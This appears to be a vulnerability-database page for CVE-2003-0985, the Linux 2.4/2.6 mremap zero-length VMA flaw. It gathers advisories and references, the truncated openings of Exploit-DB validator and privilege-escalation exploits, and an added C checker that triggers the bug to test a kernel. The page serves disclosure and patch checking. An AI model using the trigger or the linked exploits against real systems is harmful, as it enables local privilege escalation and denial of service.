CVE-2003-0985
Published: 2004-01-20
Priority: P4 (25) · Severity: high · CVSS 2.0 base score: 7.2
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C
Exploit: public exploit code available (see the Exploit-DB entries below)
EPSS: 1.23% (percentile 65.3)
The mremap system call (do_mremap) in Linux kernel 2.4.x before 2.4.21, and possibly other versions before 2.4.24, does not properly perform bounds checks, which allows local users to cause a denial of service and possibly gain privileges by causing a remapping of a virtual memory area (VMA) to create a zero length VMA, a different vulnerability than CAN-2004-0077.
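The trigger behind this description, as an added example that is not code from the original page nor from the 2004 PoC authors: one page of an anonymous mapping is moved with MREMAP_FIXED|MREMAP_MAYMOVE to a non-overlapping address with new_len == 0. On a kernel carrying the 2.4.24 fix the call fails with EINVAL before any VMA is touched; on 2.4.23/2.6.0 the page's validators report that it succeeded and left a VMA whose start equals its end in /proc/self/maps, so the same check is implemented here over the maps text. The sample maps text, its addresses, and the function names are mine (constructed for illustration).

```c
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/*
 * Constructed sample in /proc/<pid>/maps format (hypothetical addresses,
 * not captured output). The third line is the artefact the description
 * refers to: a VMA whose start equals its end.
 */
static const char sample_maps[] =
    "08048000-08049000 r-xp 00000000 03:03 2694       /home/user/mremap_bug\n"
    "60000000-60001000 rw-p 00000000 00:00 0\n"
    "60001000-60001000 rw-p 00000000 00:00 0\n"
    "bffeb000-c0000000 rwxp 00000000 00:00 0          [stack]\n";

/* Count lines whose "start-end" range has zero length. */
int count_zero_length_vmas(const char *maps)
{
    int n = 0;
    for (const char *p = maps; p && *p; ) {
        unsigned long start, end;
        if (sscanf(p, "%lx-%lx", &start, &end) == 2 && start == end)
            n++;
        const char *nl = strchr(p, '\n');
        p = nl ? nl + 1 : NULL;
    }
    return n;
}

/* Same check against the running process; -1 if /proc is not readable. */
int self_zero_length_vmas(void)
{
    FILE *f = fopen("/proc/self/maps", "r");
    if (!f)
        return -1;
    int n = 0;
    char line[4096];
    while (fgets(line, sizeof line, f))
        n += count_zero_length_vmas(line);
    fclose(f);
    return n;
}

/*
 * The 2004 PoC trigger: move one page of a two-page anonymous mapping to a
 * fixed address just past it with new_len == 0. The target does not overlap
 * the source, so the only thing standing in the way is the new_len check.
 * Returns 1 if the kernel rejected the call with EINVAL (fixed kernel),
 * 0 if the call succeeded (vulnerable behaviour), -1 on setup failure.
 */
int zero_length_remap_rejected(void)
{
    long pg = sysconf(_SC_PAGESIZE);
    char *base = mmap(NULL, 2 * pg, PROT_READ | PROT_WRITE,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (base == MAP_FAILED)
        return -1;

    errno = 0;
    void *r = mremap(base, pg, 0, MREMAP_MAYMOVE | MREMAP_FIXED, base + pg);
    int rejected = (r == MAP_FAILED && errno == EINVAL);

    munmap(base, 2 * pg);   /* covers both pages whatever the kernel did */
    return rejected;
}

int main(void)
{
    int rej = zero_length_remap_rejected();
    int zl = self_zero_length_vmas();
    printf("zero-length mremap rejected: %s\n",
           rej == 1 ? "yes (EINVAL)" : rej == 0 ? "NO - kernel accepted it" : "n/a");
    printf("zero-length VMAs in /proc/self/maps: %d\n", zl);
    printf("zero-length VMAs in constructed sample: %d\n",
           count_zero_length_vmas(sample_maps));
    return rej == 1 ? 0 : 1;
}
```

Run it unprivileged on the host you want to check; a non-zero exit means the kernel accepted a zero-length remap, which no kernel after the 2.4.24 ChangeLog entry should do. The maps check is the same signal the validator PoCs on this page print, just read programmatically instead of by eye.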
Affected
24 ranges (all for linux / linux_kernel; the feed records no version bounds, the affected versions are those in the description above)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| linux | linux_kernel | — | — |
CVSS provenance
NVD · CVSS v2.0 · 7.2 HIGH · AV:L/AC:L/Au:N/C:C/I:C/A:C
Red Hat (vendor) · 7.2 HIGH
GHSA
GHSA-p4qr-c64v-fjhc · ghsa_unreviewed · 2022-05-03 · CVE-2003-0985 [HIGH]
The mremap system call (do_mremap) in Linux kernel 2.4.x before 2.4.21, and possibly other versions before 2.4.24, does not properly perform bounds checks, which allows local users to cause a denial of service and possibly gain privileges by causing a remapping of a virtual memory area (VMA) to create a zero length VMA, a different vulnerability than CAN-2004-0077.
Red Hat
CVE-2004-0077 [HIGH] · security flaw · vendor_redhat · 2004-02-18 · CVSS 7.2
The do_mremap function for the mremap system call in Linux 2.2 to 2.2.25, 2.4 to 2.4.24, and 2.6 to 2.6.2, does not properly check the return value from the do_munmap function when the maximum number of VMA descriptors is exceeded, which allows local users to gain root privileges, a different vulnerability than CAN-2003-0985.
CVE-2003-0985 [HIGH] · security flaw · vendor_redhat · 2004-01-05 · CVSS 7.2
The mremap system call (do_mremap) in Linux kernel 2.4.x before 2.4.21, and possibly other versions before 2.4.24, does not properly perform bounds checks, which allows local users to cause a denial of service and possibly gain privileges by causing a remapping of a virtual memory area (VMA) to create a zero length VMA, a different vulnerability than CAN-2004-0077.
No detection rules found.
Exploit-DB
Linux Kernel 2.2.25/2.4.24/2.6.2 - 'mremap()' Validator · exploitdb · 2004-02-18 · CVE-2004-0077 [HIGH] · CVSS 7.2
---
/*
* Proof-of-concept exploit code for do_mremap() #2
*
* EDB Note: This is NOT to be confused with CVE-2003-0985 // https://www.exploit-db.com/exploits/141/, which would be "do_mremap() #1".
* EDB Note: This will just "test" the vulnerability. A exploit version can be found here ~ https://www.exploit-db.com/exploits/160/
*
*
* Copyright (C) 2004 Christophe Devine
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied
Exploit-DB
Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Privilege Escalation · exploitdb · 2004-01-15 · CVE-2003-0985
---
/*
* Linux kernel mremap() bound checking bug exploit.
*
* Bug found by Paul Starzetz
*
* Copyright (c) 2004 iSEC Security Research. All Rights Reserved.
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2
#define str(s) #s
#define xstr(s) str(s)
#define DSIGNAL SIGCHLD
#define CLONEFL (DSIGNAL|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_VFORK)
#define PAGEADDR 0x2000
#define
Exploit-DB
Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (2) · exploitdb · 2004-01-07 · CVE-2003-0985
---
/*
* EDB Note: This will just "test" the vulnerability.
* EDB Note: An exploit version can be found here ~ https://www.exploit-db.com/exploits/145/
*/
/*
* Proof of concept code for testing do_mremap() Linux kernel bug.
* It is based on the code by Christophe Devine and Julien Tinnes
* posted on Bugtraq mailing list on 5 Jan 2004 but it's safer since
* it avoids any kernel data corruption.
*
* The following test was done against the Linux kernel 2.6.0. Similar
* results were obtained against the kernel 2.4.23 and previous ones.
*
* buffer@mintaka:~$ gcc -o mremap_bug mremap_bug.c
* buffer@mintaka:~$ ./mremap_bug
*
* Base address : 0x60000000
*
* 08048000-08049000 r-xp 00000000 03:03 2694 /home/buffer/mremap_bug
*
Exploit-DB
Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (1) · exploitdb · 2004-01-06 · CVE-2003-0985
---
/*
* EDB Note: This will just "test" the vulnerability.
* EDB Note: An exploit version can be found here ~ https://www.exploit-db.com/exploits/145/
*/
/*
* Proof-of-concept exploit code for do_mremap()
*
* Copyright (C) 2004 Christophe Devine and Julien Tinnes
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General P
Bugzilla
CVE-2003-0985 security flaw · bugzilla · 2018-08-16 · [HIGH] · CVSS 7.2
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
The mremap system call (do_mremap) in Linux kernel 2.4.x before 2.4.21, and possibly other versions before 2.4.24, does not properly perform bounds checks, which allows local users to cause a denial of service and possibly gain privileges by causing a remapping of a virtual memory area (VMA) to create a zero length VMA, a different vulnerability than CAN-2004-0077.
Bugzilla
CVE-2004-0077 security flaw · bugzilla · 2018-08-16 · [HIGH] · CVSS 7.2
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
The do_mremap function for the mremap system call in Linux 2.2 to 2.2.25, 2.4 to 2.4.24, and 2.6 to 2.6.2, does not properly check the return value from the do_munmap function when the maximum number of VMA descriptors is exceeded, which allows local users to gain root privileges, a different vulnerability than CAN-2003-0985.
Bugzilla
CAN-2003-0984 rtc leaks · bugzilla · 2004-01-05 · [MEDIUM]
Description of problem:
Paul Starzetz discovered a flaw in bounds checking in mremap() in the
Linux kernel versions 2.4.23 and previous which may allow a local
attacker to gain root privileges. No exploit is currently available;
however, it is believed that this issue is exploitable (although not
trivially.)
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CAN-2003-0985 to this issue.
Real time clock (RTC) routines in Linux kernel 2.4.23 and earlier do not properly initialize their structures, which could leak kernel data to user space.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CAN-2003-0984 to this issue.
Additional info:
Red Hat Linux 7.x, 8 and 9 are already patched against
References
ftp://patches.sgi.com/support/free/security/advisories/20040102-01-U
http://archives.neohapsis.com/archives/bugtraq/2004-01/0070.html
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000799
http://download.immunix.org/ImmunixOS/7.3/updates/IMNX-2004-73-001-01
http://isec.pl/vulnerabilities/isec-0013-mremap.txt
http://klecker.debian.org/~joey/security/kernel/patches/patch.CAN-2005-0528.mremap
http://marc.info/?l=bugtraq&m=107332754521495&w=2
http://marc.info/?l=bugtraq&m=107332782121916&w=2
http://marc.info/?l=bugtraq&m=107340358402129&w=2
http://marc.info/?l=bugtraq&m=107340814409017&w=2
http://marc.info/?l=bugtraq&m=107350348418373&w=2
http://marc.info/?l=bugtraq&m=107394143105081&w=2
http://secunia.com/advisories/10532
http://secunia.com/advisories/20163
http://secunia.com/advisories/20202
http://secunia.com/advisories/20338
http://svn.debian.org/wsvn/kernel/patch-tracking/CVE-2005-0528?op=file&rev=0&sc=0
http://www.ciac.org/ciac/bulletins/o-045.shtml
http://www.debian.org/security/2004/dsa-413
http://www.debian.org/security/2004/dsa-417
http://www.debian.org/security/2004/dsa-423
http://www.debian.org/security/2004/dsa-427
http://www.debian.org/security/2004/dsa-439
http://www.debian.org/security/2004/dsa-440
http://www.debian.org/security/2004/dsa-442
http://www.debian.org/security/2004/dsa-450
http://www.debian.org/security/2004/dsa-470
http://www.debian.org/security/2004/dsa-475
http://www.debian.org/security/2006/dsa-1067
http://www.debian.org/security/2006/dsa-1069
http://www.debian.org/security/2006/dsa-1070
http://www.debian.org/security/2006/dsa-1082
http://www.kb.cert.org/vuls/id/490620
http://www.kernel.org/pub/linux/kernel/v2.4/ChangeLog-2.4.24
http://www.linuxsecurity.com/advisories/engarde_advisory-3904.html
http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:001
http://www.novell.com/linux/security/advisories/2004_03_linux_kernel.html
http://www.osvdb.org/3315
http://www.redhat.com/support/errata/RHSA-2003-416.html
http://www.redhat.com/support/errata/RHSA-2003-417.html
http://www.redhat.com/support/errata/RHSA-2003-418.html
http://www.redhat.com/support/errata/RHSA-2003-419.html
http://www.securityfocus.com/bid/9356
https://exchange.xforce.ibmcloud.com/vulnerabilities/14135
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A860
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A867